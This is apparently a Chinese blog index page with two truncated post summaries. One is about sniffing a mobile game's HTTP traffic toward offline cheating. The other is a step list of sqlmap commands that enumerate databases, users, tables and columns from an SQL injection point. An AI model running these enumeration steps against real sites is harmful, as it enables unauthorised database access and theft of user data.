1957

无聊蛋疼的1957写的低端博客
  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

2013年9月5日

摘要: 声明:仅供兴趣研究,切勿用于非法目的,一切于本文无关.温馨提示:用外挂会被封号--------------------------最近沉迷于百万亚瑟王。。。被里面的土豪吓尿了,作为休闲玩家,就是在实验室无聊了跑跑图而已,也不求满破,收集下卡牌而已T_T(其实就是穷逼)最近听说有外挂了,还是脱机的。。。真厉害!我从来就不会分析这些协议啊什么的。。。不过呢,我还是抓了个包。。。在Bluestacks虚拟机里面运行的,好像可以用什么app可以直接在里面抓,谁叫我不会呢。直接在外面用wireshark抓就好了~然后。。。然后。。。。尼玛,这个游戏用的http协议。。。比如。。跑图的时候是POST /c 阅读全文

posted @ 2013-09-05 22:10 1957 阅读(2334) 评论(0) 推荐(0) 编辑

摘要: 1. 找到注入点url2. sqlmap -u url -v 1--dbs 列出数据库或者 sqlmap -u url -v 1 --current-db 显示当前数据库3. sqlmap -u url -v 1 --users 列出数据库用户 --current-user当前数据库用户4. sqlmap -u url -v 1 --tables -D "milab" 列出milab数据库的表5. sqlmap -u url -v 1 --columns -T "user" -D "milab" 列出milab数据库user表的列6. 阅读全文

posted @ 2013-09-05 13:06 1957 阅读(799) 评论(0) 推荐(0) 编辑